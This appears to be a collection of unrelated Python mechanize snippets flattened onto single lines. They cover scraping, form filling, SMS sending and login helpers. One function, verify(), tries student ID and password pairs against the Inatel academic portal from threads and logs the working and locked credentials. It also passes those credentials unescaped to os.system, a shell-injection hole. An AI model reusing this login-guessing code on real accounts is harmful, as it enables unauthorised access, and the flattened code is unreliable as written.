def Top10Followers(): ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)' br = Browser() br.set_handle_robots(False) br.addheaders = [('User-Agent', ua), ('Accept', '*/*')] br.open('http://socialblade.com/instagram/top/10/followers') soup = BeautifulSoup(br.response().read()) table = soup.find('div', {'class':'content-module-wide'}).contents top10 = [] for i in xrange(1, 120, 2): top10.append(table[i].text.replace(',', '.')) top10return = [] for n in range(0, 10): top10return.append('%s | %s | %s | %s | %s\n' % ([top10[x:x+6] for x in xrange(0, len(top10), 6)][n][0], [top10[x:x+6] for x in xrange(0, len(top10), 6)][n][2], [top10[x:x+6] for x in xrange(0, len(top10), 6)][n][3], [top10[x:x+6] for x in xrange(0, len(top10), 6)][n][4], [top10[x:x+6] for x in xrange(0, len(top10), 6)][n][5])) return ''.join(top10return)
def init_browser(): browser = Browser() browser.addheaders = ( ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('User-agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' ) # We're Firefox! :P ) # browser.set_handle_gzip(True) # Currently experimental in mechanize browser.set_handle_redirect(True) browser.set_handle_refresh(False) browser.set_handle_robots(True) browser.set_handled_schemes(['http', 'https']) browser.set_proxies({}) return browser
def redirect(self): try: if self.agent == True: br = Browser() UserAgent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" header = {"User-Agent": UserAgent} br.set_handle_robots(False) br.addheaders = [("User-agent", "Fifefox")] remote_url = br.open(self.target).geturl() else: remote_url = u.urlopen(self.target).geturl() return (remote_url) except Exception as e: print(e)
def get_browser(browser=None): """ Create new browser if none is present. Returns: (:class:`mechanize.Browser`) """ if not browser: browser = Browser() browser.set_handle_robots(False) browser.addheaders = [('User-agent', ('Mozilla/5.0 (X11; U; Linux i686; en-US; ' 'rv:1.9.0.1) Gecko/2008071615 ' 'Fedora/3.0.1-1.fc9 Firefox/3.0.1'))] return browser
def HTTPcode(self): try: if self.agent == True: br = Browser() UserAgent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" header = {"User-Agent": UserAgent} br.set_handle_robots(False) br.addheaders = [("User-agent", "Fifefox")] resp = br.open(self.target).code else: resp = u.urlopen(self.target).getcode() return (resp) except (u.HTTPError, u.URLError): return (404)
def getdata(url): br = Browser() # Ignore robots.txt br.set_handle_robots(False) # Google demands a user-agent that isn't a robot br.addheaders = [('User-agent', 'Firefox')] # Retrieve the Google home page, saving the response br.open(url) res = br.response() data = res.get_data() return data
def download(url): br = Browser() br.set_handle_robots(False) br.addheaders = [( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' )] br.open("https://translate.google.com/translate?hl=&sl=&tl=&u=" + url + "&anno=2") for link in br.links(): if "https://translate.googleusercontent.com/translate_p?" in link.absolute_url: br.follow_link(link) break response = BeautifulSoup(br.response().read().decode(), "html.parser").find("pre").get_text() return response
def setupUSCIS(immInfo): br = Browser() br.addheaders = [('User-Agent', "Mozilla/5.0 \ (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko)\ Chrome/79.0.3945.130 Safari/537.36")] # opens to the sign up page br.open('https://egov.uscis.gov/casestatus/disclaimer.do') br.follow_link(text="ACCEPT") # clicks next (nothing on page 1) br.select_form("signUpForm") br.submit() #fills in the signup sheet br.select_form("signUpForm") br.form["userSubType"] = ["1"] br.form["firstName"] = immInfo["firstName"] br.form["lastName"] = immInfo["lastName"] br.form["country"] = immInfo["country"] br.form["city"] = immInfo["city"] br.form["state"] = immInfo["state"] br.form["zipCode"] = immInfo["zipCode"] br.form["email"] = immInfo["email"] br.form["phone"] = immInfo["phone"] br.form["language"] = immInfo["language"] br.submit() #generates random username and password br.select_form("signUpForm") br.form["userId"] = immInfo["username"] br.form["password"] = immInfo["password"] br.form["confirmPassword"] = immInfo["password"] #counts each question answered counter = 1 for i in range(1, 13): if counter == 5: break #checks if the answer exists if immInfo["answer" + str(i)]: br.form["question" + str(counter)] = str(i) br.form["answer" + str(counter)] = immInfo["answer" + str(i)] counter += 1 #submits form br.submit()
def verify(th, num, curso, matr, senha): URL = "https://siteseguro.inatel.br/PortalAcademico/WebLogin.aspx" br = Browser() br.set_handle_robots(False) br.open(URL) br.select_form('aspnetForm') br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) ' 'Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$tbMatricula'] = matr br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$Password'] = senha br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$dropSubCurso'] = [curso] response = br.submit(name='ctl00$Corpo$TabAcessoLogin' '$TabAluno$LogOn$LoginButton') dados = response.read() soup = BeautifulSoup(dados, 'html.parser') try: label_erro = soup.find(id='ctl00_Corpo_lblErro') label_login = soup.find(id='ctl00_LoginName1') if label_erro is not None: label_erro_str = label_erro.get_text().encode('ascii', 'ignore') if label_login is not None: os.system("echo 'Curso: %s; Matr: %s; Senha: %s' " ">> senha.log" % (curso, matr, senha)) return True elif label_erro_str == ('Sua senha est bloqueada. Entre ' 'em contato com a CRA para providenciar ' 'o desbloqueio ou aguarde 30 minutos.'): os.system("echo 'Curso: %s; Matr: %s; Senha: %s' " ">> bloqueado.log" % (curso, matr, senha)) return False else: print('Thread: %i ==> Curso: %s; Matr: %s; Senha: %s; NOK' % (num, curso, matr, senha)) except: print("Erro na biblioteca, verifique as dependencias!")
def process_irc(self, ident, _from, to, msg): """ Handle IRC messages """ # Process URLs posting for url in self.xurls(msg): if re.match("^(http|https)://(www\.|)youtube.com.*", url): self.process_irc_youtube(url) continue try: br = Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0')] br.open(url) self.irc.privmsg(self.channel, "Title: " + br.title()) except Exception, e: self.debug.error("process_irc: Exception '%s'." % e)
def send_sms_voda(user, pword, number, txt): if user[0] == '0': user = '******' + user[1:] br = Browser() # Set user-agent headers = dict(br.addheaders) headers[ "User-agent"] = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008052912 Firefox/3.0" br.addheaders = headers.items() # Login br.open(LOGIN_URL) br.select_form(nr=1) br["logon"] = user br["password"] = pword print "Logging in..." br.submit() # Send SMS br.open(SMS_URL) br.select_form(nr=1) br["destinationNumber"] = number br["messageBody"] = txt # Thanks for using shitty code Vodacom. We have to extract the submission # url from the javascript code in the document. page = br.response().read() x = page.find('function validateFormInput()') x = page.find('var actionURL', x) actionURLStart = page.find("'", x) + 1 actionURLEnd = page.find("'", actionURLStart) actionURL = page[actionURLStart:actionURLEnd] br.form.action = 'https://www.vodacom.co.za' + actionURL print "Sending message..." br.submit() response = br.response().read() if 'Your SMS has been delivered successfully.' in response: print "Message sent" else: print >> stderr, "Message sending failed. See /tmp/vodacom.html to see the response." file('/tmp/vodacom.html', 'w').write(response) exit(1)
def doLogin(): global br br = Browser() br.set_handle_robots(False) br.set_handle_refresh(False) br.addheaders = [('User-agent', 'Firefox')] br.open("https://www.qruiser.com") #response1 = br.follow_link(link) i = 0 for form in br.forms(): i += 1 #print form if i > 1: br.form = form br.form['loginname'] = 'maxberggren' br.form['loginpassword'] = '******' response = br.submit()
def get_horario(matr, senha, curso): URL = "https://siteseguro.inatel.br/PortalAcademico/Academico/Sra/WebQuadroAulas.aspx" br = Browser() br.set_handle_robots(False) br.open(URL) br.set_handle_robots(False) br.select_form('aspnetForm') br.addheaders = [( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' )] br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$tbMatricula'] = matr br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$Password'] = senha br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$dropSubCurso'] = [curso] response = br.submit( name='ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$LoginButton') dados = response.read() soup = BeautifulSoup(dados, 'html.parser') soup2 = soup.find(id='ctl00_Corpo_UCQuadroHorarios1_GridDados') all_td = soup2.find_all("td") aux = [] for var in all_td: aux.append(var.get_text()) lista_horario = [] for x in range(0, 15): lista_horario.append(aux[2 + (19 * x)]) lista_horario.append(aux[5 + (19 * x)]) lista_horario.append(aux[8 + (19 * x)]) lista_horario.append(aux[11 + (19 * x)]) lista_horario.append(aux[14 + (19 * x)]) lista_horario.append(aux[17 + (19 * x)]) return lista_horario
def submit_form(response): browser = Browser() browser.set_handle_robots(False) browser.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] browser.open(response.url) browser.select_form(nr = 0) browser.form['username'] = USERNAME browser.form['password'] = PASSWORD browser.submit() url_principal = browser.geturl() browser.open(url_principal) browser.select_form(nr = 0) print browser.response().read() browser.submit() return browser
def crawler(): global url global total_new agent = Browser() agent.addheaders = [('User-agent', 'Firefox')] agent.set_handle_robots(True) agent.set_handle_refresh(False) agent_data = agent.open(url) soup = BS(agent_data.read(), "lxml") for row in soup.find_all( 'div', attrs={"class": "list-view--item vertical-list-item"}): link = row.find('a')['href'] date = row.find('span', attrs={"class": "timestamp"}).text text = row.find('p', attrs={"class": "heading text-underline"}).text if {"date": date, "news": text, "link": link} not in total_news: total_news.append({"date": date, "news": text, "link": link})
def SHOW(url): from mechanize import Browser br = Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'Firefox')] br.open(url) response = br.open(url) data = response.read() response.close() cr = 0 match = re.compile( '<span class="bold">(.+?)</span>.*\n.*src="(.+?)"').findall(data) #matchi = re.compile('<link rel="image_src" href="(.+?)"').findall(data) for server, link in match: #for thumbnail in match: title = 'Сървър-' + server + name addLink2(name, link, 10, iconimage, title) cr = cr + 1